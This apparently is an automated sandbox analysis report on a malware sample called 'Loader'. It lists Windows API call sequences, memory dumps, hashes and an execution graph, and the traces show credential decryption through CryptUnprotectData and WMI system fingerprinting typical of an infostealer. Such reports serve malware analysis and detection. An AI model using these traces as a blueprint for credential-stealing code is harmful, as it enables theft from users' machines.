                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 002C9466
                                                                                        • Part of subcall function 002C23A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002C3B75,?,00000000,-00000008), ref: 002C2402
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C949E
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C94BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 158306478-0
                                                                                      • Opcode ID: f2333db3b15cbb9ba0bbcbc93e0f7e3a38c2690388645f27830705c2ed7f3e2f
                                                                                      • Instruction ID: 4e5e0c29dc291a7d106a36eb309d41fa5b9de7281c7812b00ca39088138b047b
                                                                                      • Opcode Fuzzy Hash: f2333db3b15cbb9ba0bbcbc93e0f7e3a38c2690388645f27830705c2ed7f3e2f
                                                                                      • Instruction Fuzzy Hash: 001104B1521547BF672567B66CCDEAF7A9CCE893A4710023CFC0591100FE708DA285B1
                                                                                      APIs
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,002D149F,00000000,00000001,?,?,?,002CA630,?,00000000,00000000), ref: 002D27C7
                                                                                      • GetLastError.KERNEL32(?,002D149F,00000000,00000001,?,?,?,002CA630,?,00000000,00000000,?,?,?,002C9F76,?), ref: 002D27D3
                                                                                        • Part of subcall function 002D2830: CloseHandle.KERNEL32(FFFFFFFE,002D27E3,?,002D149F,00000000,00000001,?,?,?,002CA630,?,00000000,00000000,?,?), ref: 002D2840
                                                                                      • ___initconout.LIBCMT ref: 002D27E3
                                                                                        • Part of subcall function 002D2805: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002D27A1,002D148C,?,?,002CA630,?,00000000,00000000,?), ref: 002D2818
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,002D149F,00000000,00000001,?,?,?,002CA630,?,00000000,00000000,?), ref: 002D27F8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                      • String ID:
                                                                                      • API String ID: 2744216297-0
                                                                                      • Opcode ID: 220002b8c6b0918ce66c286df7d3266ac0587abd035bf33c2b34287aa1d5af32
                                                                                      • Instruction ID: 9c933d849e1538cbb8f04507d0f2ef823ae739f1fc3cba8b8ffafd7ab8e41459
                                                                                      • Opcode Fuzzy Hash: 220002b8c6b0918ce66c286df7d3266ac0587abd035bf33c2b34287aa1d5af32
                                                                                      • Instruction Fuzzy Hash: 70F01536150199FBCF226F91EC4C98E3F66FB183A1B154221FA18C9220D6328D70EBA0
                                                                                      APIs
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 002B6EE7
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 002B6EF6
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 002B6EFF
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 002B6F0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: ef0ccfef6ce14c9a0c4e002279b8ce6e2cce4514f494b633728a66cc2905e27f
                                                                                      • Instruction ID: 40ca304e30ad309c9742bcbc355efeefeb58ed7ab67cbba4bcf8c53a5351249d
                                                                                      • Opcode Fuzzy Hash: ef0ccfef6ce14c9a0c4e002279b8ce6e2cce4514f494b633728a66cc2905e27f
                                                                                      • Instruction Fuzzy Hash: 8AF0B234C4020CEBDB04DBB4DA8898EBBF4FF1D200B9145A5A412EB110E730AB54CB50
                                                                                      APIs
                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 002CBBFD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorHandling__start
                                                                                      • String ID: pow
                                                                                      • API String ID: 3213639722-2276729525
                                                                                      • Opcode ID: 8f548199f9e31df2970e302b340749786547f07dae682dae57ef1ed8a1c9fa62
                                                                                      • Instruction ID: 70287949da56f37cfe1d3f00dcdea36997205d239029d071dab67c53e7522b16
                                                                                      • Opcode Fuzzy Hash: 8f548199f9e31df2970e302b340749786547f07dae682dae57ef1ed8a1c9fa62
                                                                                      • Instruction Fuzzy Hash: 71517A609391039AC7127F14DE52FBA2BA09B40B51F344F5FE48E422A8EF318DB59A46
                                                                                      APIs
                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,002C1C13,?,?,00000000,00000000,00000000,?), ref: 002C1D37
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: EncodePointer
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 2118026453-2084237596
                                                                                      • Opcode ID: a5f67071ef180219ce7f5aac63bd1686d12007c39bfad6fc2f55d0931e0b7498
                                                                                      • Instruction ID: b69b2901c2f94ea08c6e3af468a79d8287d1c756895b7a9e7d96ba522985dc5c
                                                                                      • Opcode Fuzzy Hash: a5f67071ef180219ce7f5aac63bd1686d12007c39bfad6fc2f55d0931e0b7498
                                                                                      • Instruction Fuzzy Hash: 8F41793291020AAFCF15DF94D882FEEBBB5BF49304F158299F905A7212D3359970DB50
                                                                                      APIs
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 002C17F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___except_validate_context_record
                                                                                      • String ID: csm$csm
                                                                                      • API String ID: 3493665558-3733052814
                                                                                      • Opcode ID: 84b45ee13521e61eeefad65eb0b6407db5778473253861d8bb17c803274c3b1f
                                                                                      • Instruction ID: 3ac1adad70792173c375088bc54e231e2360181524964fe855cb62a0f7387e02
                                                                                      • Opcode Fuzzy Hash: 84b45ee13521e61eeefad65eb0b6407db5778473253861d8bb17c803274c3b1f
                                                                                      • Instruction Fuzzy Hash: C331C335828256DBEF265F90CC42F6A7B69EF0A314B18475EF85449212C332CC72DB81
                                                                                      APIs
                                                                                      • __alloca_probe_16.LIBCMT ref: 002B39C9
                                                                                      • RaiseException.KERNEL32(?,?,?,?), ref: 002B39EE
                                                                                        • Part of subcall function 002B6FFC: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,?,?,?,002A303D), ref: 002B705D
                                                                                        • Part of subcall function 002BEB03: IsProcessorFeaturePresent.KERNEL32(00000017,002BA13B,?,?,?,?,00000000,?,?,002BE59E,00000000,00000000,00000000,00000000,00000000), ref: 002BEB1F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                      • String ID: csm
                                                                                      • API String ID: 1924019822-1018135373
                                                                                      • Opcode ID: 4d4c65cfe20c5e26d695b8cea7dcba8e6f22db46653ce4d8894ebd0bda71ca92
                                                                                      • Instruction ID: f7ed62072e44509fccccd8d64f288fe9a7e661abb09197d35cc3c1df4c9d7417
                                                                                      • Opcode Fuzzy Hash: 4d4c65cfe20c5e26d695b8cea7dcba8e6f22db46653ce4d8894ebd0bda71ca92
                                                                                      • Instruction Fuzzy Hash: 7421D431D10219DBCF34DF94D989AEEB7B8FF04790F150419E446AB250CBB0AE65CB81
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Yarn
                                                                                      • String ID: l-
                                                                                      • API String ID: 1767336200-3460958610
                                                                                      • Opcode ID: 39bd92aec441b33882bc753c2f0ca4c5067d2de216fcfe5d07991df547dc7cf3
                                                                                      • Instruction ID: 985e4a7b4873720f867e52565dfd713b715f0f486a5b63f1f76cf6070afc82d6
                                                                                      • Opcode Fuzzy Hash: 39bd92aec441b33882bc753c2f0ca4c5067d2de216fcfe5d07991df547dc7cf3
                                                                                      • Instruction Fuzzy Hash: 48E065333287007BEB08A665EC52FFA33E8CB417E0F10002EFD1A8A6C1ED10BC244950

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.5%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:35.3%
                                                                                      Total number of Nodes:116
                                                                                      Total number of Limit Nodes:9
                                                                                      execution_graph 34738 408720 34740 40872f 34738->34740 34739 4089ac ExitProcess 34740->34739 34741 408744 GetCurrentProcessId GetCurrentThreadId 34740->34741 34752 40899e 34740->34752 34742 408781 SHGetSpecialFolderPathW 34741->34742 34743 40877b 34741->34743 34745 408850 34742->34745 34743->34742 34745->34745 34755 43a750 34745->34755 34747 4088b3 GetForegroundWindow 34750 408942 34747->34750 34749 408995 34749->34752 34750->34749 34758 40c860 CoInitializeEx 34750->34758 34759 43c220 FreeLibrary 34752->34759 34760 43d960 34755->34760 34759->34739 34761 43a75a RtlAllocateHeap 34760->34761 34761->34747 34762 40dc62 34763 40dc90 34762->34763 34766 437120 34763->34766 34765 40dda4 34765->34765 34767 437150 CoCreateInstance 34766->34767 34769 437760 34767->34769 34770 4373a7 SysAllocString 34767->34770 34771 437770 GetVolumeInformationW 34769->34771 34773 437453 34770->34773 34780 437791 34771->34780 34774 43745b CoSetProxyBlanket 34773->34774 34775 43774f SysFreeString 34773->34775 34776 437745 34774->34776 34777 43747b SysAllocString 34774->34777 34775->34769 34776->34775 34779 437520 34777->34779 34779->34779 34781 437536 SysAllocString 34779->34781 34780->34765 34783 437556 34781->34783 34782 437732 SysFreeString SysFreeString 34782->34776 34783->34782 34784 437724 34783->34784 34785 43759a VariantInit 34783->34785 34784->34782 34787 437600 34785->34787 34786 437713 VariantClear 34786->34784 34787->34786 34788 40c8a8 CoInitializeSecurity CoInitializeSecurity 34789 417f6b 34790 417f70 34789->34790 34793 417fce 34790->34793 34794 43c2a0 LdrInitializeThunk 34790->34794 34792 418226 CryptUnprotectData 34792->34793 34793->34792 34794->34793 34688 43c9cd 34690 43c9f0 34688->34690 34689 43ca2e 34690->34689 34692 43c2a0 LdrInitializeThunk 34690->34692 34692->34689 34693 418d53 34697 418d90 34693->34697 34694 419106 34695 4190b6 34706 41c700 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 34695->34706 34697->34694 34697->34695 34699 418ec5 34697->34699 34705 41c700 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 34697->34705 34699->34694 34699->34695 34699->34699 34701 43f440 34699->34701 34703 43f460 34701->34703 34702 43f58e 34702->34699 34703->34702 34707 43c2a0 LdrInitializeThunk 34703->34707 34705->34699 34706->34694 34707->34702 34708 420cd0 34709 420d30 34708->34709 34710 420cde 34708->34710 34712 420df0 34710->34712 34713 420e00 34712->34713 34713->34713 34714 43f440 LdrInitializeThunk 34713->34714 34715 420eef 34714->34715 34795 4210f0 34810 43f2a0 34795->34810 34797 421130 34798 43a750 RtlAllocateHeap 34797->34798 34804 4217bf 34797->34804 34802 42116e 34798->34802 34799 421756 34801 43a770 RtlFreeHeap 34799->34801 34805 421766 34801->34805 34808 4211c9 34802->34808 34814 43c2a0 LdrInitializeThunk 34802->34814 34803 43a750 RtlAllocateHeap 34803->34808 34805->34804 34820 43c2a0 LdrInitializeThunk 34805->34820 34808->34799 34808->34803 34815 43c2a0 LdrInitializeThunk 34808->34815 34816 43a770 34808->34816 34811 43f2c0 34810->34811 34812 43f3ee 34811->34812 34821 43c2a0 LdrInitializeThunk 34811->34821 34812->34797 34814->34802 34815->34808 34817 43a783 34816->34817 34818 43a7a0 34816->34818 34819 43a788 RtlFreeHeap 34817->34819 34818->34808 34819->34818 34820->34805 34821->34812 34822 40c972 34824 40ca00 34822->34824 34823 40ca5e 34824->34823 34826 43c2a0 LdrInitializeThunk 34824->34826 34826->34823 34827 43f6b0 34829 43f6d0 34827->34829 34828 43f7de 34831 43f72e 34829->34831 34833 43c2a0 LdrInitializeThunk 34829->34833 34831->34828 34834 43c2a0 LdrInitializeThunk 34831->34834 34833->34831 34834->34828 34716 4357d6 34717 4357f6 34716->34717 34718 43583d 34717->34718 34720 43c2a0 LdrInitializeThunk 34717->34720 34720->34717 34726 43521a 34727 435232 34726->34727 34728 435246 GetUserDefaultUILanguage 34727->34728 34729 43526f 34728->34729 34730 43c5dd 34731 43c600 34730->34731 34732 43c63e 34731->34732 34737 43c2a0 LdrInitializeThunk 34731->34737 34736 43c2a0 LdrInitializeThunk 34732->34736 34735 43c735 34736->34735 34737->34732 34835 43cf7d GetForegroundWindow 34839 43e2a0 34835->34839 34837 43cf8b GetForegroundWindow 34838 43cf9c 34837->34838 34840 43e2b0 34839->34840 34840->34837

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 437120-437142 1 437150-437164 0->1 1->1 2 437166-437177 1->2 3 437180-4371ac 2->3 3->3 4 4371ae-4371ef 3->4 5 4371f0-43721f 4->5 5->5 6 437221-43723a 5->6 8 437240-43724b 6->8 9 4372e7-4372f2 6->9 10 437250-43727e 8->10 11 437300-437345 9->11 10->10 12 437280-437293 10->12 11->11 13 437347-4373a1 CoCreateInstance 11->13 14 4372a0-4372d7 12->14 15 437760-43778f call 43dd10 GetVolumeInformationW 13->15 16 4373a7-4373db 13->16 14->14 18 4372d9-4372e3 14->18 22 437791-437795 15->22 23 437799-43779b 15->23 19 4373e0-437428 16->19 18->9 19->19 21 43742a-437455 SysAllocString 19->21 26 43745b-437475 CoSetProxyBlanket 21->26 27 43774f-43775c SysFreeString 21->27 22->23 24 4377ad-4377b4 23->24 28 4377b6-4377bd 24->28 29 4377cd-4377e6 24->29 30 437745-43774b 26->30 31 43747b-43748f 26->31 27->15 28->29 32 4377bf-4377cb 28->32 33 4377f0-43781c 29->33 30->27 34 437490-4374a4 31->34 32->29 33->33 35 43781e-437854 33->35 34->34 37 4374a6-437518 SysAllocString 34->37 36 437860-437899 35->36 36->36 38 43789b-4378cf call 41e120 36->38 39 437520-437534 37->39 43 4378d0-4378d8 38->43 39->39 41 437536-437558 SysAllocString 39->41 46 437732-437741 SysFreeString * 2 41->46 47 43755e-437580 41->47 43->43 45 4378da-4378dc 43->45 48 4378e2-4378f2 call 408110 45->48 49 4377a0-4377a7 45->49 46->30 54 437586-437589 47->54 55 437728-43772e 47->55 48->49 49->24 51 4378f7-4378fe 49->51 54->55 56 43758f-437594 54->56 55->46 56->55 57 43759a-4375f1 VariantInit 56->57 58 437600-43763b 57->58 58->58 59 43763d-437652 58->59 60 437656-437658 59->60 61 437713-437724 VariantClear 60->61 62 43765e-437664 60->62 61->55 62->61 63 43766a-437677 62->63 64 437679-43767e 63->64 65 4376ad 63->65 67 43768c-437690 64->67 68 4376af-4376d6 call 407f80 call 408e10 65->68 69 437692-43769b 67->69 70 437680 67->70 79 4376d8 68->79 80 4376dd-4376e9 68->80 73 4376a2-4376a6 69->73 74 43769d-4376a0 69->74 72 437681-43768a 70->72 72->67 72->68 73->72 77 4376a8-4376ab 73->77 74->72 77->72 79->80 81 4376f0-437710 call 407fb0 call 407f90 80->81 82 4376eb 80->82 81->61 82->81
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437399
                                                                                      • SysAllocString.OLEAUT32(BA76C471), ref: 0043742F
                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043746D
                                                                                      • SysAllocString.OLEAUT32(BA76C471), ref: 004374A7
                                                                                      • SysAllocString.OLEAUT32(BA76C471), ref: 00437537
                                                                                      • VariantInit.OLEAUT32(B7B6B58C), ref: 004375A3
                                                                                      • VariantClear.OLEAUT32(?), ref: 00437714
                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 00437739
                                                                                      • SysFreeString.OLEAUT32(?), ref: 0043773F
                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 00437750
                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,3ECE381E,00000000,00000000,00000000,00000000), ref: 00437788
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                      • String ID: 'b3$+b3$<=$QN$o{&$|fgd$VT
                                                                                      • API String ID: 2573436264-693069525
                                                                                      • Opcode ID: 048cd3638f9aa30c2422dd9c5d4a8e805386becde083d0b49842c8ea2d9ee945
                                                                                      • Instruction ID: 11b2219e2d4eb91c49afa51d93a85ddcd4f2b2d1b700cdb42df764d3aeaf4aa9
                                                                                      • Opcode Fuzzy Hash: 048cd3638f9aa30c2422dd9c5d4a8e805386becde083d0b49842c8ea2d9ee945
                                                                                      • Instruction Fuzzy Hash: 6622FFB6A083009BD310CF69CC85B5BBBE5EBC9724F14892DE5D49B391D778E805CB86

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 91 408720-408731 call 43baa0 94 408737-40873e call 4349d0 91->94 95 4089ac-4089ae ExitProcess 91->95 98 408744-408779 GetCurrentProcessId GetCurrentThreadId 94->98 99 4089a7 call 43c220 94->99 100 408781-408847 SHGetSpecialFolderPathW 98->100 101 40877b-40877f 98->101 99->95 103 408850-4088a8 100->103 101->100 103->103 104 4088aa-4088d6 call 43a750 103->104 107 4088e0-408921 104->107 107->107 108 408923-408940 GetForegroundWindow 107->108 109 408971-408989 call 409be0 108->109 110 408942-40896f 108->110 113 408995-40899c 109->113 114 40898b call 40c860 109->114 110->109 113->99 116 40899e-4089a4 call 407f90 113->116 117 408990 call 40b520 114->117 116->99 117->113
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00408744
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040874E
                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408818
                                                                                      • GetForegroundWindow.USER32 ref: 00408938
                                                                                      • ExitProcess.KERNEL32 ref: 004089AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                      • String ID:
                                                                                      • API String ID: 4063528623-0
                                                                                      • Opcode ID: 8c6a67c788db48e810d45b014de09d35d07e3ab25e5fa4732a97b1b6f9c9c616
                                                                                      • Instruction ID: 39600d5385372255f45065d560af0ce17ce8acffdbc4af24d7fd64a4904d4598
                                                                                      • Opcode Fuzzy Hash: 8c6a67c788db48e810d45b014de09d35d07e3ab25e5fa4732a97b1b6f9c9c616
                                                                                      • Instruction Fuzzy Hash: F6515BB3E443145FC318BFA59C8535AB7929BC9314F0F823D9D98BB392E9789C0586C5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 324 417f6b-417f85 call 407f90 327 417f90-417fa4 324->327 327->327 328 417fa6-417fae 327->328 329 417fb0-417fbb 328->329 330 417fea-41802f call 401a60 328->330 332 417fc0-417fc7 329->332 336 418030-418053 330->336 334 417fd0-417fd6 332->334 335 417fc9-417fcc 332->335 334->330 338 417fd8-417fe7 call 43c2a0 334->338 335->332 337 417fce 335->337 336->336 339 418055-41806e call 401da0 336->339 337->330 338->330 344 418261-41826b 339->344 345 418251-41825c call 407f90 339->345 346 418392-4183b0 call 43dd10 339->346 347 418075-418079 339->347 348 418245-418248 339->348 349 418387-41838f call 407f90 339->349 350 4183b6-4183f3 339->350 355 418270-418279 344->355 345->350 346->350 353 418080-418086 347->353 348->345 349->346 354 418400-418426 350->354 353->353 360 418088-4180b3 353->360 354->354 361 418428-418441 call 401da0 354->361 355->355 362 41827b-418294 355->362 363 4180b5-4180b8 360->363 364 4180ba 360->364 361->344 361->345 361->346 361->347 361->348 361->349 361->350 366 418296 362->366 367 41829d-4182c9 call 407f80 362->367 363->364 369 4180bb-4180c9 363->369 364->369 366->367 375 4182d0-418308 367->375 373 4180d0 369->373 374 4180cb-4180ce 369->374 376 4180d1-4180e5 call 407f80 373->376 374->373 374->376 375->375 378 41830a-418315 375->378 382 4181e3-41823e call 43dd10 CryptUnprotectData 376->382 383 4180eb-4180f2 376->383 380 418331-41833f 378->380 381 418317-41831f 378->381 385 418341-418347 380->385 386 418363 380->386 384 418320-41832f 381->384 382->344 382->345 382->346 382->348 382->349 382->350 388 418112-41815c call 41d600 * 2 383->388 384->380 384->384 389 418350-41835f 385->389 390 418366-418381 call 408c40 386->390 399 418100-41810c 388->399 400 41815e-418176 call 41d600 388->400 389->389 393 418361 389->393 390->349 393->390 399->382 399->388 400->399 403 418178-4181a0 400->403 404 4180f4-4180f7 403->404 405 4181a6-4181c6 call 41d600 403->405 404->399 405->399 408 4181cc-4181de 405->408 408->399
                                                                                      APIs
                                                                                        • Part of subcall function 0043C2A0: LdrInitializeThunk.NTDLL(004370F0), ref: 0043C2CE
                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00418235
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataInitializeThunkUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 279577407-0
                                                                                      • Opcode ID: 01811f29e235513fc7299bdc820a11077f974d21a0dddd2b594181d633a5cebe
